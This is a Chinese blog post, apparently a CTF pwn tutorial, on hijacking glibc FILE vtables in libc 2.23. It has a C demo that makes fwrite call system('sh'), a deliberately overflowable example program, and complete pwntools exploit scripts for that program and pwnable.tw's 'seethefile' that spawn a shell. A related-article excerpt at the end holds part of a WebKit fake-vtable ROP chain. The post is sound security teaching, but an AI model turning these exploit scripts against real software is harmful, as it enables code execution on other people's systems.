vtable伪造

最新推荐文章于 2022-08-04 11:12:50 发布
最新推荐文章于 2022-08-04 11:12:50 发布
阅读量461 收藏
点赞数
分类专栏: FILE_related
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/110172571
版权

vtable伪造

​ libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的,在之前的版本的利用就不叙述了。虽然libc 数据段的 vtable不可以写入,但是可以通过伪造vtable并且修改_IO_FILE_plus->vtable这个指针来实现劫持程序流程。

直接用wiki上的例子

#define system_ptr 0x7ffff7a523a0;
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main(void)
{
    FILE *fp;
    long long *vtable_addr,*fake_vtable;

    fp=fopen("123.txt","rw");
    fake_vtable=malloc(0x40);

    vtable_addr=(long long *)((long long)fp+0xd8);     //vtable offset

    vtable_addr[0]=(long long)fake_vtable;

    memcpy(fp,"sh",3);

    fake_vtable[7]=system_ptr; //xsputn

    fwrite("hi",2,1,fp);
}

vtable 中的函数调用时会把对应的_IO_FILE_plus 指针作为第一个参数传递,也就是_flags成员变量。

这里伪造fp的vtable指针,使其指向我们伪造好的区域,fwrite会调用_IO_jump_t中偏移为0x38的指针(__xsputn),让它指向system函数,而fp->_flags上直接放“sh”字符串。运行fwrite时实际上去执行system(“sh”)。(gdb调试运行,不可直接运行,要不然system的地址不正确)

在这里插入图片描述

注:stdin\stdout\stderr这些_IO_FILE_plus结构体变量也是可以被修改的,这些流在 printf\scanf 等函数中就会被使用到。在 libc2.23 之前,这些 vtable 是可以写入并且不存在其他检测的。

例1

源码如下example.c

#include<stdio.h>
#include<stdlib.h>
char buf1[0x20]={0};     //0x601080
FILE *fp=NULL;           //0x6010a0
char buf2[0x400]={0};    //0x6010c0
void backdoor(){
	system("no sh");
}
int main(){
	fp = fopen("key.txt","rw");
	gets(buf1);
	fclose(fp);
}

编译命令

$ gcc -g example.c -o example -no-pie

明显的溢出,不过是在bss段,可以覆盖fp指针和buf2,此处把伪造的file结构体和vtable结构体分别放在buf2上和buf2+0x200上。

file结构体需要伪造的地方

1,_flags 修改为"/bin/sh" 作为vtable调用时的第一个参数

2,_lock

_IO_acquire_lock,此处存在一个对_lock的调用,而_lock是一个指针,指向一个结构体_IO_lock_t,这里只需要让这个指针指向一个合法的地址,并且0x18个字节内的值全是‘\x00’即可。

typedef struct { int lock; int cnt; void *owner; } _IO_lock_t;

在这里插入图片描述

3,vtable指向我们伪造的vtable结构


vtable中需要构造的地方

1,__close

这里改成我们需要执行的地方(system_plt)

寻找方法:可以用peda的pattern create 寻找

在这里插入图片描述

漏洞触发方式:执行fclose时,调用了vtable上的__close(被伪造位system_plt的地址)

最终exp

from pwn import*
context.log_level = 'debug'
p = process('./example')
elf = ELF('./example')
system = elf.plt['system']

buf2 = 0x6010c0 
fake_vtable_ptr = buf2+0x200

fake_file = '/bin/sh\x00'.ljust(0x88,'\x00')+p64(buf2+0x400)
fake_file = fake_file.ljust(0xd8,'\x00')+p64(fake_vtable_ptr)

fake_vtable = '\x00'*0x88+p64(system)

payload = 'a'*0x20+p64(buf2)+p64(0)*3
payload += fake_file.ljust(0x200,'\x00')
payload += fake_vtable
#gdb.attach(p,'b *0x40063a')
p.sendline(payload)

p.interactive()
例2

pwnable.tw上的seethefile

附件下载(可能被墙):https://pwnable.tw/static/chall/seethefile

32位程序,攻击方法和例1一样,只是各个结构体成员的偏移量不一样而已。

main函数伪代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char nptr; // [esp+Ch] [ebp-2Ch]
  unsigned int v4; // [esp+2Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  init();
  welcome();
  while ( 1 )
  {
    menu();
    __isoc99_scanf("%s", &nptr);
    switch ( atoi(&nptr) )
    {
      case 1:
        openfile();
        break;
      case 2:
        readfile();
        break;
      case 3:
        writefile();
        break;
      case 4:
        closefile();
        break;
      case 5:
        printf("Leave your name :");
        __isoc99_scanf("%s", &name);
        printf("Thank you %s ,see you next time\n", &name);
        if ( fp )
          fclose(fp);
        exit(0);
        return;
      default:
        puts("Invaild choice");
        exit(0);
        return;
    }
  }
}

主要功能:

1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件

2)readfile:从fp读取0x18F个字节到magicbuf上

3)closefile:关闭文件,指针fp赋0

4)writefile:只是一个打印函数,而不能写入,不能打印flag,FLAG,}名的文件

case 5处有明显的溢出,可以覆盖fp指针。

相对来说比较新颖的是,这里libc的获取

由于linux独特的文件形式存储,文件的内存信息存储与/proc/pid/maps中,这里pid使用self来代替。

参考文章 http://p4nda.top/2017/09/20/pwnable-tw-seethefile/

在这里插入图片描述

利用这里利用方法和例1一致就不再赘述,直接上exp

from pwn import*
context.log_level = 'debug'
context.update(arch='amd64',os='linux',timeout=1)
p = process('./seethefile')
#p = remote('',)
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

def pr(a,addr):
	log.success(a+'===>'+hex(addr))
def openfile(name):
    p.recvuntil('Your choice :')
    p.sendline('1')
    p.recvuntil('to see :')
    p.sendline(name)

def readfile():
    p.recvuntil('Your choice :')
    p.sendline('2')

def writefile():
    p.recvuntil('Your choice :')
    p.sendline('3')

def closefile():
    p.recvuntil('Your choice :')
    p.sendline('4')
 
def exit(name):
    p.recvuntil('Your choice :')
    p.sendline('5')
    p.recvuntil('your name :')
    p.sendline(name)

name_addr = 0x804b260
openfile('/proc/self/maps')
readfile()
writefile()
readfile()
writefile()
p.recvuntil('f7')
libcbase = int('0xf7'+p.recv(6),16)+0x1000
system = libcbase + libc.sym['system']
pr('libcbase',libcbase)
pr('system',system)
#gdb.attach(p,'b *0x8048B0F')
fake_file = ('sh'+'\x00'*2).ljust(0x48,'\x00')+p32(0x804b500)
fake_file = fake_file.ljust(0x94,'\x00')+p32(name_addr+0x20+0x94+4)
fake_vtable = '\x00'*64 + p32(system)
payload = 'a'*0x20 + p32(0x0804B284) + fake_file + fake_vtable
exit(payload)
p.interactive()
TTYflag
关注
专栏目录
IO_FILE hack 修改vtable
qq_46441427的博客
08-19 475
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 IO_file hackIO调用的vtable函数freadfwritefclose思路例题2018 HCTF the end分析思路:利用 IO调用的vtable函数 fread _IO_sgetn函数调用了vtable的_IO_file_xsgetn。 _IO_doallocbuf函数调用了vtable的_IO_file_doallocate以初始化输入缓冲区。 vtable中的_IO_file_doallocate调用了vtable
ctf-pwn-堆—IO_FILE
xy_369的博客
05-26 358
ctf-pwn-堆—文件IO 教程
劫持vtable修改程序执行流——pwnable seethefile
weixin_46521144的博客
07-22 386
前置知识 vtable vtable是和file结构体并列的一内容,是函数指针数组,其中包含了对file的一些操作函数。 以下来自ctf-wiki 在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8 以下是vtable的实际结构,如图所示,我们需要关注的是close部分。也就是关闭文件时将会调用的函数。 ## 劫持原理 以下内容摘自https://www.jianshu.com/p/2e00afb01606 分析close函数,最关键的利用点在这里 注意
关于Vtable的修改问题-不要随意加Columns
北冥之鲲
12-22 662
在开发中,碰到写QL使用Independence语句的时候,往往可能需要一些字时该Vtable中没有的,这是在Vtable中加columns要慎重,因为columns是对所有QLs起作用的,很有可能因为多加一个column就导致别人写的QLs出错。
Pwn with File结构体之利用 vtable 进行 ROP
weixin_30556959的博客
08-03 179
前言 本文以 0x00 CTF 2017 的 babyheap 为例介绍下通过修改 vtable 进行 rop 的操作 (:-_- 漏洞分析 首先查看一下程序开启的安全措施 18:07 haclh@ubuntu:0x00ctf $ checksec ./babyheap [*] '/home/haclh/workplace/0x00ctf/babyheap' Arch: amd64...
Qtcreator在编译程序提示找不到Vtable的一种情况分析
03-01 162
原因可能是。程序中使用了qobject的派生类.但是没有在pro文件里面的include里面把该头文件包含进去。。
var fakeVtable_setjmp = p.malloc32(0x200); var fakeVtable_longjmp = p.malloc32(0x200); var original_context = p.malloc32(0x40); var modified_context = p.malloc32(0x40); p.write8(fakeVtable_setjmp.add32(0x0), fakeVtable_setjmp); p.write8(fakeVtable_setjmp.add32(0xA8), webKitBase.add32(OFFSET_WK_setjmp_gadget_two)); // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8] p.write8(fakeVtable_setjmp.add32(0x10), original_context); p.write8(fakeVtable_setjmp.add32(0x8), libSceLibcInternalBase.add32(OFFSET_libcint_setjmp)); p.write8(fakeVtable_setjmp.add32(0x1C8), webKitBase.add32(OFFSET_WK_setjmp_gadget_one)); // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8] p.write8(fakeVtable_longjmp.add32(0x0), fakeVtable_longjmp); p.write8(fakeVtable_longjmp.add32(0xA8), webKitBase.add32(OFFSET_WK_longjmp_gadget_two)); // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8] p.write8(fakeVtable_longjmp.add32(0x10), modified_context); p.write8(fakeVtable_longjmp.add32(0x8), libSceLibcInternalBase.add32(OFFSET_libcint_longjmp)); p.write8(fakeVtable_longjmp.add32(0x1C8), webKitBase.add32(OFFSET_WK_longjmp_gadget_one)); // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8] function launch_chain(chain) { chain.push(window.gadgets["pop rdi"]); chain.push(original_context); chain.push(libSceLibcInternalBase.add32(OFFSET_libcint_longjmp)); p.write8(textAreaVtPtr, fakeVtable_setjmp); textArea.scrollLeft = 0x0; p.write8(modified_context.add32(0x00), window.gadgets["ret"]); p.write8(modified_context.add32(0x10), chain.stack); p.write8(modified_context.add32(0x40), p.read8(original_context.add32(0x40))) p.write8(textAreaVtPtr, fakeVtable_longjmp); textArea.scrollLeft = 0x0; p.write8(textAreaVtPtr, textAreaVtable); }请解释以上代码?
07-15
- `fakeVtable_setjmp`:分配了大小为0x200的内存块,用于构建伪造的`setjmp`函数的vtable。 - `fakeVtable_longjmp`:分配了大小为0x200的内存块,用于构建伪造的`longjmp`函数的vtable。 - `original_context`...
House of apple 一种新的glibc中IO攻击方法.doc
07-09
最后会遍历_IO_list_all 存放的每一个 IO_FILE 结构体,如果满足条件的话,会调用每个结构体中 vtable->_overflow 函数指针指向的函数。 使用 largebin attack 可以劫持_IO_list_all 变量,将其替换为伪造的 IO_...
IO_FILE:2018 HCTF the_end
Mira_Hu的博客
02-13 1767
kips: libc2.23 标准输入输出 定义顺序 #define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \ static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \ struct _IO_FILE_plus NAME \ = {FILEBUF_LITERAL(CHAI...
【C++】虚函数表vtable理解
厄多斯L的博客
06-07 1691
相关知识点 二级指针 不同指针类型的解引用 指针类型转换 二级指针 如果一个内存存储的是一个指针,则指向该内存的指针至少是一个二级指针。及若*p为地址,则p至少是一个二级指针。而*p为非地址,则p为一级指针。 不同类型指针的解引用 若p为int型指针,则*p解引用的地址长度范围为4个字节;而如果p为一个对象b的指针,则*p解引用的地址长度范围为sizeof(b)。 指针类型的转...
linux IO_FILE 利用
热门推荐
sky123博客
03-29 4万+
基本结构 _IO_FILE_plus 定义如下: struct _IO_FILE_plus { FILE file; const struct _IO_jump_t *vtable; }; 包括一个结构体 file 和一个指针 vtable 。 其中 vtable 指向一个函数指针表,很多 IO_FILE 的攻击都是围绕它展开的。 _IO_FILE_plus 类型的结构有 _IO_2_1_stdin_ 、 _IO_2_1_stdout_ 和 _IO_2_1_stderr_ 。另外有头指针 _IO_
64位c语言调用32位glibc,glibc fclose源代码阅读及伪造_IO_FILE利用fclose实现任意地址执行...
weixin_34952710的博客
05-20 424
简介最近学习了一下_IO_FILE的利用,刚好在pwnable.tw上碰到一道相关的题目。拿来做了一下,遇到了一些困难,不过顺利解决了,顺便读了一波相关源码,对_IO_FILE有了更深的理解。文章分为三部分,分别是利用原理、实例和源码阅读。源码部分比较无聊所以我把它放在了最后。原理原理我们使用fopen打开一个文件会在堆上分配一块内存区域用来存储FILE结构体,存储的结构体包含两个部分,前一部分为...
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 3078
强网杯2022 pwn 赛题分析——house_of_cat
CTF二进制快速入门笔记01
kelxLZ的博客
11-30 1514
常见的二进制程序漏洞 栈溢出,堆溢出,UAF,这个UAF比较经常被问到 上述漏洞怎么利用 一、栈溢出 1.1 基础栈结构 进入函数时: CALLXXX PUSH retadddr(call的下一条指令,目的:知道怎么回来) JMP XXX 进入到XXX PUSH RBP(保存栈基址,好恢复) MOV RBP,RSP(栈底抬上去) SUB RSP,XXh(抬高栈顶给局部函数预留空间) 退出函数时: leave mov rsp,rbp(把rsp弄回来) pop rbp(把rb..
深入理解acquire和release原理源码及lock独有特性acquireInterruptibly和tryAcquireNanos
sophia__yu的博客
11-21 1万+
我们在调用Lock的lock上锁时,其实调用的是AQS的模板方法acquire();在调用lock的unlock时其实调用的是release方法。 public void unlock() { sync.release(1); } ...
IO_REMOVE_LOCK(删除锁)
lixiangminghate的专栏
05-16 1050
转自:IO_REMOVE_LOCK(删除锁)IO_REMOVE_LOCK(删除锁)的具体结构没有公开,WDK的文档中中查不到IO_REMOVE_LOCK。最开始看到IO_REMOVE_LOCK是在WDK的例子event中。下面是参考网上的一些资料之后的一点总结,错误的地方请指正。为什么要用IO_REMOVE_LOCK?WDM 驱动程序在处理设备删除 IRP 并释放驱动程序分配的内存后可能接收到附加...
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1613
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
undefined reference vtable for
最新发布
07-09
当你在编译C++程序时遇到 "undefined reference to `vtable for [class]'”这样的错误,通常是在处理虚函数(Virtual Function)的时候。`vtable` (Virtual Table) 是C++运行时用于存储类的所有虚函数指针的表。当一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值